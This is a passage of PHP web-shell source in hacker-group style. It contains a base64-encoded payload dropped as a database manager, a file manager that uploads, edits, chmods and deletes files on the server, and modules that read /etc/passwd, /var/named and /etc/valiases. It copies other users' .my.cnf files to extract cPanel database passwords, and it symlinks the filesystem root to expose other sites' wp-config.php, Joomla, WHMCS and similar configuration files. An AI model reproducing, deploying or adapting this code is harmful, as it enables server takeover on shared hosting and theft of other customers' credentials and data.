3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
1820. $write = fwrite($f2, base64_decode($sml_db));
1821. if ($write) {
1822. @chmod('s/db.php', 0755);
1823. }
1824. echo "</br></br><center><b>GO TO : <a href='s/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
1825. }
1826. }
1827. ?>
1828. <center>
1829. <?php
1830. echo '<p><table class="explore"><tr>
1831. <table width="700" border="0" cellpadding="3" cellspacing="1">
1832. <tr><td>Path : ';
1833. if(isset($_GET['path'])){
1834. $path = $_GET['path'];
1835. }else{
1836. $path = getcwd();
1837. }
1838. $path = str_replace('\\','/',$path);
1839. $paths = explode('/',$path);
1840.  
1841. foreach($paths as $id=>$pat){
1842. if($pat == '' && $id == 0){
1843. $a = true;
1844. echo '<a href="?path=/">/</a>';
1845. continue;
1846. }
1847. if($pat == '') continue;
1848. echo '<a href="?path=';
1849. for($i=0;$i<=$id;$i++){
1850. echo "$paths[$i]";
1851. if($i != $id) echo "/";
1852. }
1853. echo '">'.$pat.'</a>/';
1854. }
1855. echo '</td></tr><tr><td></div></div>';
1856. }
1857. if(isset($_FILES['file'])){
1858. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
1859. echo '<font color="green">File Upload Done.</font><br />';
1860. }else{
1861. echo '<font color="blue">File Upload Error.</font><br />';
1862. }
1863. }
1864. if(isset($_GET['filesrc'])){
1865. echo "<tr><td>Current File : ";
1866. echo $_GET['filesrc'];
1867. echo '</tr></td></table><br />';
1868. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
1869. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
1870. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
1871. if($_POST['opt'] == 'chmod'){
1872. if(isset($_POST['perm'])){
1873. if(chmod($_POST['path'],$_POST['perm'])){
1874. echo '<font color="green">Change Permission Done.</font><br />';
1875. }else{
1876. echo '<font color="blue">Change Permission Error.</font><br />';
1877. }
1878. }
1879. echo '<form method="POST">
1880. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
1881. <input type="hidden" name="path" value="'.$_POST['path'].'">
1882. <input type="hidden" name="opt" value="chmod">
1883. <input type="submit" value="Go" />
1884. </form>';
1885. }elseif($_POST['opt'] == 'rename'){
1886. if(isset($_POST['newname'])){
1887. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
1888. echo '<font color="green">Change Name Done.</font><br />';
1889. }else{
1890. echo '<font color="blue">Change Name Error.</font><br />';
1891. }
1892. $_POST['name'] = $_POST['newname'];
1893. }
1894. echo '<form method="POST">
1895. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
1896. <input type="hidden" name="path" value="'.$_POST['path'].'">
1897. <input type="hidden" name="opt" value="rename">
1898. <input type="submit" value="Go" />
1899. </form>';
1900. }elseif($_POST['opt'] == 'edit'){
1901. if(isset($_POST['src'])){
1902. $fp = fopen($_POST['path'],'w');
1903. if(fwrite($fp,$_POST['src'])){
1904. echo '<font color="green">Edit File Done.</font><br />';
1905. }else{
1906. echo '<font color="blue">Edit File Error.</font><br />';
1907. }
1908. fclose($fp);
1909. }
1910. echo '<form method="POST">
1911. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
1912. <input type="hidden" name="path" value="'.$_POST['path'].'">
1913. <input type="hidden" name="opt" value="edit">
1914. <input type="submit" value="Go" />
1915. </form>';
1916. }
1917. echo '</center>';
1918. }else{
1919. echo '</table><br /><center>';
1920. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
1921. if($_POST['type'] == 'dir'){
1922. if(rmdir($_POST['path'])){
1923. echo '<font color="green">Delete Dir Done.</font><br />';
1924. }else{
1925. echo '<font color="blue">Delete Dir Error.</font><br />';
1926. }
1927. }elseif($_POST['type'] == 'file'){
1928. if(unlink($_POST['path'])){
1929. echo '<font color="green">Delete File Done.</font><br />';
1930. }else{
1931. echo '<font color="blue">Delete File Error.</font><br />';
1932. }
1933. }
1934. }
1935. echo '</center>';
1936. $scandir = scandir($path);
1937. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
1938. <tr class="first">
1939. <td><center>Name</center></td>
1940. <td><center>Size</center></td>
1941. <td><center>Permissions</center></td>
1942. <td><center>Options</center></td>
1943. </tr>';
1944.  
1945. foreach($scandir as $dir){
1946. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
1947. echo "<tr>
1948. <td><a href=\"?path=$path/$dir\">$dir</a></td>
1949. <td><center>--</center></td>
1950. <td><center>";
1951. if(is_writable("$path/$dir")) echo '<font color="green">';
1952. elseif(!is_readable("$path/$dir")) echo '<font color="blue">';
1953. echo perms("$path/$dir");
1954. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
1955.  
1956. echo "</center></td>
1957. <td><center><form method=\"POST\" action=\"?option&path=$path\">
1958. <select name=\"opt\">
1959. <option value=\"\"></option>
1960. <option value=\"delete\">Delete</option>
1961. <option value=\"chmod\">Chmod</option>
1962. <option value=\"rename\">Rename</option>
1963. </select>
1964. <input type=\"hidden\" name=\"type\" value=\"dir\">
1965. <input type=\"hidden\" name=\"name\" value=\"$dir\">
1966. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
1967. <input type=\"submit\" value=\">\" />
1968. </form></center></td>
1969. </tr>";
1970. }
1971. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
1972. foreach($scandir as $file){
1973. if(!is_file("$path/$file")) continue;
1974. $size = filesize("$path/$file")/1024;
1975. $size = round($size,3);
1976. if($size >= 1024){
1977. $size = round($size/1024,2).' MB';
1978. }else{
1979. $size = $size.' KB';
1980. }
1981.  
1982. echo "<tr>
1983. <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
1984. <td><center>".$size."</center></td>
1985. <td><center>";
1986. if(is_writable("$path/$file")) echo '<font color="green">';
1987. elseif(!is_readable("$path/$file")) echo '<font color="blue">';
1988. echo perms("$path/$file");
1989. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
1990. echo "</center></td>
1991. <td><center><form method=\"POST\" action=\"?option&path=$path\">
1992. <select name=\"opt\">
1993. <option value=\"\"></option>
1994. <option value=\"delete\">Delete</option>
1995. <option value=\"chmod\">Chmod</option>
1996. <option value=\"rename\">Rename</option>
1997. <option value=\"edit\">Edit</option>
1998. </select>
1999. <input type=\"hidden\" name=\"type\" value=\"file\">
2000. <input type=\"hidden\" name=\"name\" value=\"$file\">
2001. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
2002. <input type=\"submit\" value=\">\" />
2003. </form></center></td>
2004. </tr>";
2005. }
2006. echo '</table>
2007. </div></tr>';
2008. }
2009. echo '
2010. </BODY>
2011. </HTML>';
2012. function perms($file){
2013. $perms = fileperms($file);
2014.  
2015. if (($perms & 0xC000) == 0xC000) {
2016. // Socket
2017. $info = 's';
2018. } elseif (($perms & 0xA000) == 0xA000) {
2019. // Symbolic Link
2020. $info = 'l';
2021. } elseif (($perms & 0x8000) == 0x8000) {
2022. // Regular
2023. $info = '-';
2024. } elseif (($perms & 0x6000) == 0x6000) {
2025. // Block special
2026. $info = 'b';
2027. } elseif (($perms & 0x4000) == 0x4000) {
2028. // Directory
2029. $info = 'd';
2030. } elseif (($perms & 0x2000) == 0x2000) {
2031. // Character special
2032. $info = 'c';
2033. } elseif (($perms & 0x1000) == 0x1000) {
2034. // FIFO pipe
2035. $info = 'p';
2036. } else {
2037. // Unknown
2038. $info = 'u';
2039. }
2040.  
2041. // Owner
2042. $info .= (($perms & 0x0100) ? 'r' : '-');
2043. $info .= (($perms & 0x0080) ? 'w' : '-');
2044. $info .= (($perms & 0x0040) ?
2045. (($perms & 0x0800) ? 's' : 'x' ) :
2046. (($perms & 0x0800) ? 'S' : '-'));
2047.  
2048. // Group
2049. $info .= (($perms & 0x0020) ? 'r' : '-');
2050. $info .= (($perms & 0x0010) ? 'w' : '-');
2051. $info .= (($perms & 0x0008) ?
2052. (($perms & 0x0400) ? 's' : 'x' ) :
2053. (($perms & 0x0400) ? 'S' : '-'));
2054.  
2055. // World
2056. $info .= (($perms & 0x0004) ? 'r' : '-');
2057. $info .= (($perms & 0x0002) ? 'w' : '-');
2058. $info .= (($perms & 0x0001) ?
2059. (($perms & 0x0200) ? 't' : 'x' ) :
2060. (($perms & 0x0200) ? 'T' : '-'));
2061.  
2062. return $info;
2063. }
2064. ?>
2065. <?php
2066. if (isset($_GET['idb']) && ($_GET['idb'] == 'salto')) {
2067. ?>
2068. <form action="?&amp;idb=salto" method="post">
2069. <?php
2070. set_time_limit(0);
2071. @$passwd = fopen('/etc/passwd','r');
2072. if (!$passwd) { die('<b>[+] ERROR | GA BISA BACA /etc/passwd [+]</b>'); }
2073. $pub = array();
2074. $users = array();
2075. $conf = array();
2076. $i = 0;
2077. while(!feof($passwd))
2078. {
2079. $str = fgets($passwd);
2080. if ($i > 10)
2081. {
2082. $pos = strpos($str,':');
2083. $username = substr($str,0,$pos);
2084. $dirz = '/home/'.$username.'/public_html/';
2085. if (($username != ''))
2086. {
2087. if (is_readable($dirz))
2088. {
2089. array_push($users,$username);
2090. array_push($pub,$dirz);
2091. }
2092. }
2093. }
2094. $i++;
2095. }
2096. echo '<br><br>';
2097. echo "<center><b>[+] KETEMU ".sizeof($pub)." MAHO"." [+]</b><br/><br/>";
2098. foreach ($users as $user)
2099. {
2100. $path = "/home/$user/public_html/";
2101. echo "<a href='?y&#61;$path' target='_blank' style='font-weight:bold; color:#FFFFFF;'>$path</a><br>";
2102. }
2103. echo "<br>";
2104. echo '</center></body></html>';
2105. }
2106.  
2107. ?>
2108. <?php
2109. if (isset($_GET['idb']) && ($_GET['idb'] == 'cp')) {
2110. ?>
2111. <form action="?&amp;idb=cp" method="post">
2112. <?php
2113. /**
2114. * @author: FaisaL Ahmed aka blue X
2115. * @mail: me@faialahmed.me
2116. * @Screenshot: http://prntscr.com/7c1p34
2117. * @Last Updated: 01 June 2015
2118. */
2119.  
2120. @ini_set('display_errors',0);
2121. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
2122. $ar0=explode($marqueurDebutLien, $text);
2123. $ar1=explode($marqueurFinLien, $ar0[$i]);
2124. return trim($ar1[0]);
2125. }
2126. echo "<center>";
2127. $d0mains = @file('/etc/named.conf');
2128. $domains = scandir("/var/named");
2129.  
2130. if ($domains or $d0mains)
2131. {
2132. $domains = scandir("/var/named");
2133. if($domains) {
2134. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
2135. $count=1;
2136. $dc = 0;
2137. $list = scandir("/var/named");
2138. foreach($list as $domain){
2139. if(strpos($domain,".db")){
2140. $domain = str_replace('.db','',$domain);
2141. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2142. $dirz = '/home/'.$owner['name'].'/.my.cnf';
2143. $path = getcwd();
2144.  
2145. if (is_readable($dirz)) {
2146. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
2147. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
2148. $password=entre2v2($p,'password="','"');
2149. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
2150. $dc++;
2151. }
2152.  
2153. }
2154. }
2155. echo '</table>';
2156. $total = $dc;
2157. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
2158. echo '</center>';
2159. }else{
2160. $d0mains = @file('/etc/named.conf');
2161. if($d0mains) {
2162. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
2163. $count=1;
2164. $dc = 0;
2165. $mck = array();
2166. foreach($d0mains as $d0main){
2167. if(@eregi('zone',$d0main)){
2168. preg_match_all('#zone "(.*)"#',$d0main,$domain);
2169. flush();
2170. if(strlen(trim($domain[1][0])) >2){
2171. $mck[] = $domain[1][0];
2172. }
2173. }
2174. }
2175. $mck = array_unique($mck);
2176. $usr = array();
2177. $dmn = array();
2178. foreach($mck as $o) {
2179. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
2180. $usr[] = $infos['name'];
2181. $dmn[] = $o;
2182. }
2183. array_multisort($usr,$dmn);
2184. $dt = file('/etc/passwd');
2185. $passwd = array();
2186. foreach($dt as $d) {
2187. $r = explode(':',$d);
2188. if(strpos($r[5],'home')) {
2189. $passwd[$r[0]] = $r[5];
2190. }
2191. }
2192. $l=0;
2193. $j=1;
2194. foreach($usr as $r) {
2195. $dirz = '/home/'.$r.'/.my.cnf';
2196. $path = getcwd();
2197. if (is_readable($dirz)) {
2198. copy($dirz, ''.$path.'/'.$r.'.txt');
2199. $p=file_get_contents(''.$path.'/'.$r.'.txt');
2200. $password=entre2v2($p,'password="','"');
2201. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
2202. $dc++;
2203. flush();
2204. $l=$l?0:1;
2205. $j++;
2206. }
2207. }
2208. }
2209. echo '</table>';
2210. $total = $dc;
2211. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
2212. echo '</center>';
2213.  
2214. }
2215. }else{
2216. echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
2217. }
2218.  
2219. echo "</body></html>";
2220. }
2221. ?>
2222. <?
2223. ####################################################
2224. #####V1ru5 v1.0 ############
2225. #####CODED by S1r_V1ru5 ############
2226. #####V1ru5 Group Cyber Army ############
2227. ####################################################
2228.  
2229.  
2230. set_time_limit(0);
2231. error_reporting(0);
2232.  
2233.  
2234. function openBaseDir()
2235. {
2236. $openBaseDir = ini_get("open_basedir");
2237. if (!$openBaseDir)
2238. {
2239. $openBaseDir = '<font color="green">OFF</font>';
2240. }
2241. else
2242. {
2243. $openBaseDir = '<font color="blue">ON</font>';
2244. }
2245. return $openBaseDir;
2246. }
2247.  
2248.  
2249.  
2250.  
2251.  
2252.  
2253.  
2254. ##.htaccess
2255. @mkdir('empek',0777);
2256. @symlink("/","empek/amis");
2257. $htaccss = "Options all
2258. DirectoryIndex Sux.html
2259. AddType text/plain .php
2260. AddHandler server-parsed .php
2261. AddType text/plain .html
2262. AddHandler txt .html
2263. Require None
2264. Satisfy Any";
2265.  
2266. file_put_contents("empek/.htaccess",$htaccss);
2267. $etc = file_get_contents("/etc/passwd");
2268. $etcz = explode("\n",$etc);
2269.  
2270.  
2271. ##Symlink to the amis
2272. foreach($etcz as $etz){
2273. $etcc = explode(":",$etz);
2274. error_reporting(0);
2275.  
2276. $current_dir = posix_getcwd();
2277. $dir = explode("/",$current_dir);
2278.  
2279. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
2280. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
2281. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
2282. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"empek/".$etcc[0].'-WordPress.txt');
2283. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"empek/".$etcc[0].'-PhpBB.txt');
2284. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"empek/".$etcc[0].'-vBulletin.txt');
2285. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
2286. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
2287. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
2288. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"empek/".$etcc[0].'-Joomla.txt');
2289. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"empek/".$etcc[0].'-IPB.txt');
2290. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"empek/".$etcc[0].'-MyBB.txt');
2291. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"empek/".$etcc[0].'-SMF.txt');
2292. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"empek/".$etcc[0].'-Drupal.txt');
2293. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"empek/".$etcc[0].'-e107.txt');
2294. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"empek/".$etcc[0].'-Seditio.txt');
2295. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"empek/".$etcc[0].'-osCommerce.txt');
2296. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2297. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2298. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2299. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2300. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2301. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2302. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2303. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2304. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2305. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2306. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2307. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2308. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"empek/".$etcc[0].'-WHMCS.txt');
2309. }
2310. #####################
2311.  
2312.  
2313.  
2314.  
2315.  
2316.  
2317. if(isset($_REQUEST['do'])){
2318. switch ($_REQUEST['do']){
2319. ###################################CASE: var_named
2320. case 'var_named':
2321.  
2322. if(is_readable("/var/named")){
2323. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2324. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
2325. $list = scandir("/var/named");
2326. foreach($list as $domain){
2327. if(strpos($domain,".db")){
2328. $i += 1;
2329. $domain = str_replace('.db','',$domain);
2330. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2331.  
2332. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2333. }
2334. }
2335. echo "<center>Total Domains Found: ".$i."</center><br />";
2336. }else{ echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
2337.  
2338. break;
2339. #####################END
2340.  
2341.  
2342.  
2343.  
2344.  
2345.  
2346.  
2347. ###########CASE: /etc/passwd
2348. case 'etc_passwd':
2349.  
2350.  
2351. error_reporting(0);
2352. $etc = file_get_contents("/etc/passwd");
2353. $etcz = explode("\n",$etc);
2354. if(is_readable("/etc/passwd")){
2355.  
2356. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2357. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
2358.  
2359. $list = scandir("/var/named");
2360.  
2361. foreach($etcz as $etz){
2362. $etcc = explode(":",$etz);
2363.  
2364. foreach($list as $domain){
2365. if(strpos($domain,".db")){
2366. $domain = str_replace('.db','',$domain);
2367. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2368. if($owner['name'] == $etcc[0])
2369. {
2370. $i += 1;
2371. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2372. }}}}
2373. echo "<center>Total Domains Found: ".$i."</center><br />";}
2374.  
2375. break;
2376. #########################END
2377.  
2378.  
2379.  
2380.  
2381.  
2382.  
2383.  
2384. ########CASE: etc_named.conf
2385. case 'etc_named.conf':
2386.  
2387. if(is_readable("/etc/named.conf")){
2388. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2389. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
2390. $named = file_get_contents("/etc/named.conf");
2391. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
2392. foreach($domains[1] as $domain){
2393. $domain = trim($domain);
2394. $i += 1;
2395. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2396. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2397. }
2398. echo "<center>Total Domains Found: ".$i."</center><br />";
2399.  
2400. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
2401.  
2402. break;
2403. ##################################END
2404.  
2405.  
2406.  
2407.  
2408.  
2409.  
2410.  
2411.  
2412. #############CASE etc_valiases
2413. case 'etc_valiases':
2414.  
2415. if(is_readable("/etc/valiases")){
2416. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2417. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
2418. $list = scandir("/etc/valiases");
2419. foreach($list as $domain){
2420. $i += 1;
2421. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2422. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center><td class='td1'><font color='blue'>".$owner['name']."</font></center></td><td class='td1'><center><a href='empek/amis".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
2423. }
2424. echo "<center>Total Domains Found: ".$i."</center><br />";
2425. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
2426.  
2427. break;
2428. ############END
2429.  
2430.  
2431.  
2432.  
2433.  
2434. ##########CASE posix
2435. case 'posix':
2436.  
2437. echo <<<empek
2438. <form method='POST'>
2439. <br><br>Input Limit<br>
2440. <input size='20' value='0' name='min' type='text'>
2441. to
2442. <input size='20' value='1024' name='max' type='text'>
2443. <br>
2444. <input value='SYMLINK' name='' type='submit'><br><br>
2445. </form>
2446.  
2447. empek;
2448. if($_POST){
2449. $min = $_POST['min'];
2450. $max = $_POST['max'];
2451.  
2452. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
2453. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
2454.  
2455. $p = 0;
2456. error_reporting(0);
2457. $list = scandir("/var/named");
2458. for($p = $min; $min <= $max; $p++)
2459. {
2460. $user = posix_getpwuid($p);
2461. if(is_array($user)){
2462.  
2463. foreach($list as $domain){
2464. if(strpos($domain,".db")){
2465. $domain = str_replace('.db','',$domain);
2466. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2467. if($owner['name'] == $user['name'])
2468. {
2469. $i += 1;
